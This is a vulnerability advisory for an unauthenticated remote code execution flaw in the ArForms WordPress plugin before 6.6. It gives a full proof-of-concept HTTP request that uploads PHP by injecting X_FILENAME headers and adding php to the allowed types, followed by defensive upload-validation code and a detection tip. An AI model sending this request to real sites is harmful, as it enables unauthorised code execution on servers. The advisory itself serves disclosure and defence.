wpexploit
WPEX-ID: DC34DC2D-D5A1-4E28-8507-33F659EAD647
History: May 17, 2024 - 12:00 a.m.

ArForms < 6.6 - Unauthenticated RCE

Published: 2024-05-17 00:00:00
Author: mgthuramoemyint
Tags: arforms, unauthenticated, rce, vulnerability, update

AI Score: 9.6 High (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.1%)

Description: The plugin allows unauthenticated users to modify uploaded files in such a way that PHP code can be uploaded when an upload file input is included on a form.

1. Create a form with an upload input
2. As an unauthenticated user, upload an image file and intercept the request.
3. Modify it like the following:

```
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: testbox
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X_FILENAME: 3readme.php
X-FILENAME: 3readme.php
Content-Type: multipart/form-data; boundary=---------------------------231372247329806589063676810774
Content-Length: 1110
Origin: http://testbox
Connection: close
Referer: http://testbox/wordpress/index.php/2024/04/08/hello-world/
Cookie: wordpress_ba62313c33aedb7d46cae591be063de4=mirphak%7C17151795;wpforms_fields_group_settings_advanced=true; 45df-a0b7-fdcb263f17ee57190a; PHPSESSID=m0tplmmem0pm28kseu7iola5d7
 
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="action"
 
arf_send_form_data
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="frm"
 
100
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="field_id"
 
gfeav2_58393
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="file_type"
 
text/html
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="types_arr"
 
htm|html, jpg|jpeg|php
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="is_preview"
 
 
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="files"; filename="readme.html"
Content-Type: text/html
 
<?phP  phpinfo(); ?>
 
-----------------------------231372247329806589063676810774
Content-Disposition: form-data; name="token"
 
72JcFplqUK
-----------------------------231372247329806589063676810774--
```

Access the file (in the example above it is `3readme.php`) and see the PHP execute.
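Two things in the request above are under the attacker's control and should never have been: the stored name (supplied through the `X_FILENAME` / `X-FILENAME` headers, turning `readme.html` into `3readme.php`) and the permitted types (the `types_arr` and `file_type` form fields, which the client simply extends with `php`). The following is an added example of a server-side upload check that takes none of those decisions from the request; it is not ArForms code, the function names and the allowlist are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example (not ArForms code): server-side upload validation that
// ignores client-controlled naming and type hints. Function names and the
// allowlist are hypothetical.

declare(strict_types=1);

// Server-side allowlist: extension => expected MIME type. Unlike the
// `types_arr` form field in the request above, the client cannot extend it.
const UPLOAD_ALLOWLIST = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
    'pdf'  => 'application/pdf',
];

/**
 * Decide whether an uploaded file may be stored and, if so, under what name.
 * Returns the server-generated file name, or null when the upload is rejected.
 *
 * @param string $clientName  The filename from the multipart part (untrusted;
 *                            taken from $_FILES[...]['name'], never from a header).
 * @param string $tmpPath     PHP's temporary copy of the upload ($_FILES[...]['tmp_name']).
 */
function validate_upload(string $clientName, string $tmpPath): ?string
{
    // 1. Only the basename of the multipart filename is considered. Custom
    //    headers such as X_FILENAME / X-FILENAME are never consulted.
    $base = basename(str_replace('\\', '/', $clientName));

    // 2. Require a plain name with exactly one extension, so "readme.php.jpg"
    //    style names are refused outright rather than interpreted.
    if (!preg_match('/^[A-Za-z0-9_-]+\.[A-Za-z0-9]+$/', $base)) {
        return null;
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!isset(UPLOAD_ALLOWLIST[$ext])) {
        return null;
    }

    // 3. Check the bytes on disk with libmagic, not the part's Content-Type
    //    header or the `file_type` form field, both of which the client sets.
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($tmpPath);
    if ($detected !== UPLOAD_ALLOWLIST[$ext]) {
        return null;
    }

    // 4. Store under a server-generated name; the client's chosen name and any
    //    header-supplied name never reach the filesystem.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Demo with constructed inputs (run from the CLI).
if (PHP_SAPI === 'cli') {
    $tmp = tempnam(sys_get_temp_dir(), 'upload');

    // The payload from the request above, under the name it was sent with:
    // rejected because .html is not on the allowlist.
    file_put_contents($tmp, "<?phP  phpinfo(); ?>\n");
    var_dump(validate_upload('readme.html', $tmp));               // NULL

    // Same payload with an allowlisted extension: rejected because libmagic
    // reports the content as PHP/text, not image/jpeg.
    var_dump(validate_upload('readme.jpg', $tmp));                // NULL

    // A header-style name like the one injected via X_FILENAME: rejected by
    // the extension check regardless of content.
    var_dump(validate_upload('3readme.php', $tmp));               // NULL

    // Constructed GIF header bytes under a matching extension: accepted and
    // renamed to a random 32-hex-character name with a .gif extension.
    file_put_contents($tmp, "GIF89a\x01\x00\x01\x00\x80\x00\x00");
    var_dump(validate_upload('avatar.gif', $tmp));                // string(36) "<random>.gif"

    unlink($tmp);
}
```

The design point is that every decision (which extensions exist, what the stored name is, whether the bytes match the extension) is made from server-side state plus the uploaded bytes themselves; the form fields and custom headers the request above relies on are simply not read. As a complementary control, the upload directory should be served with script execution disabled, so that even a mistakenly stored `.php` file is returned as static content. For detection, a POST to `admin-ajax.php` carrying `X_FILENAME` or `X-FILENAME` headers whose value ends in a server-executable extension is a precise signal for a WAF or log review.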
